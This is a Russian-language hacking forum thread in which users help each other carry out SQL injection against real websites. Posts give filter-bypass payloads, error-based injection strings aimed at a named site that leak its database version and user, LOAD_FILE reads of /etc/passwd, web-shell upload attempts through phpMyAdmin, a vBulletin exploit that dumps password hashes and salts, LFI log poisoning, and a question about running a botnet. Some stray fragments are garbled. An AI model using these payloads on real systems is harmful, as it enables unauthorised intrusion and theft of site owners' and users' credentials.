UPDATE USER_Pr SET GRANTEE = 'apache'@'127.0.0.1' WHERE GRANTEE = 'apache'@'localhost'
так
UPDATE USER_PRIVILEGES SET GRANTEE = 'apache'@'127.0.0.1' WHERE GRANTEE = 'apache'@'localhost'



Я так сразу написал .

Есть еще предложения ??

Groove said:
Есть еще предложения ??



UPDATE USER_PRIVILEGES SET GRANTEE = 'apache\'@\'127.0.0.1' WHERE GRANTEE = 'apache\'@\'localhost'

Так с этим разобрались ) Вот еще вопрос , допустим у меня в таблице 3 и более колонок в них несколько юзеров , как мне поменять сразу ник юзеру , (1калонка) пасс (2калонка) icq (3калонка ) ????

Groove said:
Так с этим разобрались ) Вот еще вопрос , допустим у меня в таблице 3 и более колонок в них несколько юзеров , как мне поменять сразу ник юзеру , (1калонка) пасс (2калонка) icq (3калонка ) ????


UPDATE таблица SET 1калонка = '', 2калонка = '', 3калонка = '' WHERE юзер = ''

http://ru.wikipedia.org/wiki/Update_(SQL)

Попробуй так

UPDATE USER_PRIVILEGES SET GRANTEE = '\'apache\'@\'127.0.0.1\'' WHERE GRANTEE = \''apache\'@\'localhost\'';

Есть ли какие-то способы обхода фильтрации слов?

Тоесть скрипт, который тупо приводит запрос к нижнему регистру, а потом ищет наличее слов union, select, where и тд.

Я говорю про что-то кроме /*!%0D(seLeCT)%0D*/

Pirotexnik said:
Есть ли какие-то способы обхода фильтрации слов?
Тоесть скрипт, который тупо приводит запрос к нижнему регистру, а потом ищет наличее слов union, select, where и тд.
Я говорю про что-то кроме /*!%0D(seLeCT)%0D*/


Это не тупо

Pirotexnik said:
Есть ли какие-то способы обхода фильтрации слов?
Тоесть скрипт, который тупо приводит запрос к нижнему регистру, а потом ищет наличее слов union, select, where и тд.
Я говорю про что-то кроме /*!%0D(seLeCT)%0D*/


попробуй uni%0bon+se%0blect

smirk said:
попробуй uni%0bon+se%0blect


Пустой символ это круто, конечно. Но так не обойдешь. Он же сказал, тупо переводит в нижний регистр.

smirk said:
попробуй uni%0bon+se%0blect


а разве пустой символ не разрезает оператор? О_о

Ereee, я имел ввиду алгоритм примитивный... но действенный.

Проверил по поводу %0d и 0x0d

Режут оператор не катит. Давайте думать.

Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '184.170.246.53' (4) in /home/ehza/public_html/home/themes/default/pages/auction.php on line 13

Unable to connect to MySQL

Вот такую штуку выдаёт при заходе по определённой ссылке. Можно ли это раскрутить и поиметь БД?

xcedz said:
Первое вхождение ищет или все?


Как понять?

xyetaxyeta, ты ошибку читал?

Невозможно подключится к серверу MySQL. Как ты думаешь, можно?)

Нет

xyetaxyeta said:
Нет


кинь линк в пм. посмотрю

xyetaxyeta said:
Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '184.170.246.53' (4) in /home/ehza/public_html/home/themes/default/pages/auction.php on line 13
Unable to connect to MySQL
Вот такую штуку выдаёт при заходе по определённой ссылке. Можно ли это раскрутить и поиметь БД?



Pirotexnik said:
кинь линк в пм. посмотрю




" if author else f"


xyetaxyeta said:
Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '184.170.246.53' (4) in /home/ehza/public_html/home/themes/default/pages/auction.php on line 13
Unable to connect to MySQL
Вот такую штуку выдаёт при заходе по определённой ссылке. Можно ли это раскрутить и поиметь БД?



Pirotexnik said:
кинь линк в пм. посмотрю




Зачем ссылку в ПМ? с этого IP нет доступа к MySQL. Он не сможет подключиться. Написано же что "can't connect..."

xcedz said:
ну как. например
если вырезает только первое вхождение, то
selectselect
первое вхождение вырезает
select
втрое остается.


Врядли. Скорее, после нахождения слова весь запрос убивает.

Начнем сначала

Итак я решил ясно расписать мою задачу на сегодняшний день. Поехали!

ДАНО(как в школе): Некий русский сайт

ЗАДАЧА: Залить шелл с любыми правами

ДОСТУПЫ: Phpmyadmin(root); самодельная, на первый взгляд платная админка(Главный администратор)

ПРИМЕЧАНИЯ: 1)Касаемо админки: кто хочет из интереса или же с целью помощи узнать её название пишите в ПМ, расскажу, покажу, но только на мой взгляд шансов 1-2%, так как панель истинно идиотская

2)Касаемо phpmyadmin:

Исправно работает команда INTO OUTFILE, криво работает команда LOAD_FILE, поясняю, при выполнении кода происходит вот такое в результате:


PHP:
SELECT LOAD_FILE('/etc/passwd')

Результат:

BLOB[2,2KB]

Как мы видим, на выходе файл, экспортировать, прочитать невозможно. /etc/passwd взято как пример, с другими директориями работает так же.

ОСЛОЖНЕНИЯ: До полного идиотизма ситуации добавляет то условие, что директории сайта закрыты для Create/Edit, то есть Errcode (13). Искал все возможные папки и все они оказались закрытые. Следовательно /homedir/site/html/ все три составляющие закрыты. Радовало только одно что хотя бы как минимум /var/ и /tmp/ открыты, но толку от них...

РЕШЕНИЕ: Это я предоставляю вам, античатовцы Ваши идеи, предложения, ссылки с информацией, а самое главное ИСПРАВЛЕНИЙ я жду ниже или в ПМ

PS: кто решит эту проблему того я назову королем заливания шеллов по крайней мере королем этого форума

stan0009 said:
Итак я решил ясно расписать мою задачу на сегодняшний день. Поехали!
ДАНО
(как в школе
): Некий русский сайт
ЗАДАЧА:
Залить шелл с любыми правами
ДОСТУПЫ:
Phpmyadmin(root); самодельная, на первый взгляд платная админка(Главный администратор)
ПРИМЕЧАНИЯ:
1)Касаемо админки: кто хочет из интереса или же с целью помощи узнать её название пишите в ПМ, расскажу, покажу, но только на мой взгляд шансов 1-2%, так как панель истинно идиотская
2)Касаемо phpmyadmin:
Исправно работает команда INTO OUTFILE, криво работает команда LOAD_FILE, поясняю, при выполнении кода происходит вот такое в результате:

PHP:
SELECT LOAD_FILE('/etc/passwd')

Результат:

BLOB[2,2KB]

Как мы видим, на выходе файл, экспортировать, прочитать невозможно. /etc/passwd взято как пример, с другими директориями работает так же.
ОСЛОЖНЕНИЯ:
До полного идиотизма ситуации добавляет то условие, что директории сайта закрыты для Create/Edit, то есть Errcode (13). Искал все возможные папки и все они оказались закрытые. Следовательно /homedir/site/html/ все три составляющие закрыты. Радовало только одно что хотя бы как минимум /var/ и /tmp/ открыты, но толку от них...
РЕШЕНИЕ:
Это я предоставляю вам, античатовцы
Ваши идеи, предложения, ссылки с информацией, а самое главное ИСПРАВЛЕНИЙ я жду ниже или в ПМ
PS: кто решит эту проблему того я назову королем заливания шеллов
по крайней мере королем этого форума


Создай темповую таблицу. И результаты лоад файла записывай в нее


PHP:
UPDATE`tmp`SET`column`=LOAD_FILE('/etc/passwd')WHERE`id`='1';

stan0009,

вообще-то там есть доп. опции(в phpmyadmin), с помощью которых ты сможешь не записывая в таблицу результат запроса сразу смотреть.

Code:
http://www.gorodokboxing.com/news.php?cat=1'

подскажите, как раскрутить.

faza02 said:

Code:
http://www.gorodokboxing.com/news.php?cat=1'

подскажите, как раскрутить.


Не скулья.

Отвечаю всем)

Isis

уже такое пробовалось, я думал не тот запрос...

тогда результат был таков:

MySQL вернула пустой результат (т.е. ноль рядов)

сейчас он, увы, такой же

Ereee

а можно поподробнее? точнее конкретнее. При экспорте, например, вылетает на главную страницу... Вы когда нибудь работали с этими опциями? кстати, версия 2.9.1.1.

xcedz

узнать бы еще как это понять). На бд висит еще несколько мини-сайтов. Если сайт является частью БД, то и такое возможно. А что? есть какие то способы?

faza02, софт говорит time-based. В жизни такое не крутил =)

stan009,view result in HEX [снять галку] и т.д. Поищи, точно видел.

дело дрянь видимо.

галки нет, точнее, когда выполнил запрос ничего как BLOB и распечатать не дают.

это при select

при update пустое место, хоть ты убирай везде галки, хоть не убирай.

запросами ничего не добьешься, доказано!

делю вину своих рук и вину гребанного русифицированного phpmyadmin с такой же кривой админкой на пополам)

xcedz напомню, что действие разворачивается в phpmyadmin и куда "плюсовать" пока что мне не постижимо. Пойду читать конфиги *okay*

faza02 said:

Code:
http://www.gorodokboxing.com/news.php?cat=1'

подскажите, как раскрутить.


_http://www.gorodokboxing.com/news.php?cat=1'and(select*from(select(name_const(v ersion(),1)),name_const(version(),1))a)and'

5.0.77-log:kievboxing1_portal:kievboxing1_box@da2.adamant .ua:redhat-linux-gnu

er9j6@, читер

я потерялся с выводом. как?

er9j6@ said:
_http://www.gorodokboxing.com/news.php?cat=1'and(select*from(select(name_const(v ersion(),1)),name_const(version(),1))a)and'
5.0.77-log:kievboxing1_portal:kievboxing1_box@da2.adamant .ua:redhat-linux-gnu


Константами далеко не уйти, поэтому:


Code:
http://www.gorodokboxing.com/news.php?cat=1'and(select+1/**/from(select+count(*),concat((select+concat(table_n ame,0x00)/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by+x)a)and'

P.S. Позор мне.

Ereee суровый, плюс после select решил не заменять на /**/

спасибо

хоть что-то получилось.

load_file проканал. теперь как его использовать?

PS: view in HEX опять не нашел)) отображается только часть тестового /etc/passwd.

так как же залить шелл через load_file?

нужен сам процесс.

кстати я уже написал что доступной на запись диры нет, кроме var tmp итд.

в чем заключается сейчас проблема. когда я выполнил запрос в таблицу test например load_file /etc/passwd то отображается не полный текст в таблице, а только первые 2-3 десятка символов. Как это исправить?

там над выводом еесть кажется кнопочка +Option вроде так, вот в ней поставь галку на FULL text кажется так

stan0009, load_file() читает файл, через него залить нельзя.

подскажите, через какую функцию в mysql сделать так, чтобы php-код из нее исполнялся?

/showpost.php?p=3053677&postcount=248


Подскажите как юзать данную скулю. Там blind?

Никак, то что Ereee привел вообще не inj, там же написано в заголовке. Зато ниже постом ниже уже описание sql inj через User Agent.

А как тогда использовать ту скулю с user agent?

----------

Есть ли какой-нибудь инструмент для удобства использования такой скули?

kise said:
А как тогда использовать ту скулю с user agent?
----------
Есть ли какой-нибудь инструмент для удобства использования такой скули?


Что дальше будет?

Спасибо.

Ereee я ни разу не работал с подменой кук, хедеров и т.п.

HAXTA4OK said:
там над выводом еесть кажется кнопочка +Option вроде так, вот в ней поставь галку на FULL text кажется так


блин я чувствую что уже рядом моя цель.

в моем phpmyadmine версии 2.9.1.1 таких "команд" типа options, view text, full не существует как бы. Есть ключ или как говорит phpmyadmin индекс с названием full text.

Сам в ключах не разбираюсь, и как это использовать так же не знаю. Мне нужен такой человек, который прошел через такую админку. Чтобы опыт был, если по другому.

stan0009 said:
блин я чувствую что уже рядом моя цель.
в моем phpmyadmine версии 2.9.1.1 таких "команд" типа options, view text, full не существует как бы. Есть ключ или как говорит phpmyadmin индекс с названием full text.
Сам в ключах не разбираюсь, и как это использовать так же не знаю. Мне нужен такой человек, который прошел через такую админку. Чтобы опыт был, если по другому.


скинь в ПМ адрес этой админки пароль логин и если есть асю тоже напиши

index.php?id=1 [ ] union(select(1),2,3,4,5,6)


там где [ ], что должно быть, чтобы выполнилось верно?

фильтрация на + /**/ %0a и остальное

faza02 said:
там где [ ], что должно быть, чтобы выполнилось верно?
фильтрация на + /**/ %0a и остальное


Попробуй:


Code:
index.php?id=(1)union(select(1),2,3,4,5,6)

faza02 said:
там где [ ], что должно быть, чтобы выполнилось верно?
фильтрация на + /**/ %0a и остальное


Либо

(1)and(1)=(1)union(select(1),2,3,4,5,6)+--+

Я вас наверно уже задолбал)

ну ладно)

при открытии мини-шелла с кодом:


Code:


получается вот такая петрушка при ?cmd=phpinfo() и так далее:

либо unexpected $end

либо T_STRING

system не катит, так как disallow.

в чем подвох?

stan0009 said:
Я вас наверно уже задолбал)
ну ладно)
при открытии мини-шелла с кодом:

Code:


получается вот такая петрушка при ?cmd=phpinfo() и так далее:
либо unexpected $end
либо T_STRING
system не катит, так как disallow.
в чем подвох?



?cmd=phpinfo();

если бы. так при любых командах

я догадываюсь что дело в сервере

Сообщение от faza02
там где [ ], что должно быть, чтобы выполнилось верно?
фильтрация на + /**/ %0a и остальное


Вот такое нагуглил, может, что-нибудь подойдет в твоем случае


PHP:
Q:Нашел sql-инъекцию,но злые админы п� �ставили на фильтрацию на� �пробел.Существуют ли анал оги пробела в sql-запросах?

A:Еще как существуют!Вот н� �иболее часто применяемые� �способы для замены пробе� �а:

+или%2B;

табуляция" "или%09;

возврат каретки" "или%0D;

перевод строки%0A;

коментарий/**/

скобки:select(1)from(users)where(id=1)



если бы. так при любых командах
я догадываюсь что дело в сервере




PHP:




Поэкспериментируй с этими.

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)


как тут в конце заменить на скобки?

Ребята!!) Подскажите как управлять RxBot в мирке (Botnet)

Нашел эксплоит на exploit-db.com для Vbulletin 4.1.3


Code:
&messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1

а DB мне в ответ вот так:


Code:
Invalid SQL:

SELECT socialgroup.name
FROM socialgroup AS socialgroup
WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1);

MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3

Вопрос: как победить эту долбаную скобку в конце?

Добавить вот здесь:

&messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1

тогда нужно сделать так

&messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt )) FROM user WHERE userid=1

faza02 said:
как тут в конце заменить на скобки?


подкорректируй свой вопрос,а то не понятно и всмысле в конце скобки,поставь правильно вопрос

LFI

Камрады помогите советом.

Есть LFI, нащупал только лги ошибок, отсылаю запрос с кодом курлом:


HTML:
curl http://www.domain.org/nopages1.php --referer "http://go"

В логе режет конструкцию

[PHP]
PHP:
[COLOR="#0000BB"][COLOR="#007700"]

Faaax, нужен запрос без плюсов, /**/ и остальных знаков, обойтись только скобками

Faaax said:
тогда нужно сделать так
&messagegroupid[0]=3) UNION
(
SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt )
)
FROM user WHERE userid=1


Что за бред ты написал... У него остается закрывающая скобка в конце запроса, что и вызывает ошибку. Остается она потому что он поставил закрывающую после тройки, чем самым нарушил логику.

DronS,

ты забыл комментарий после запроса:


&messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1
--+f

Ну можно и комментарий)

Есть дамп БД, необходимо некоторые данные привести в другой вид.

Первоначально:


`users` (`id`, `username`, `password`, `salt`, ....


Необходимо вырвать данные из определённых колонок, а именно: username:password:salt

Подскажите, чем лучше это сделать?

P.S. Вручную не предлагать.

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)

так тут у тебя ни одного пробела нету

gl0w,это не бред

если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!

Faaax said:
gl0w,это не бред
если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!


Все правильно он подсказал. Ты ответ БД читал до конца?)


Code:
WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1);

2gl0w спасибо, запрос корректен теперь

2Ereee с коментарием тоже нормуль идет

Faaax =\

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)

так видно?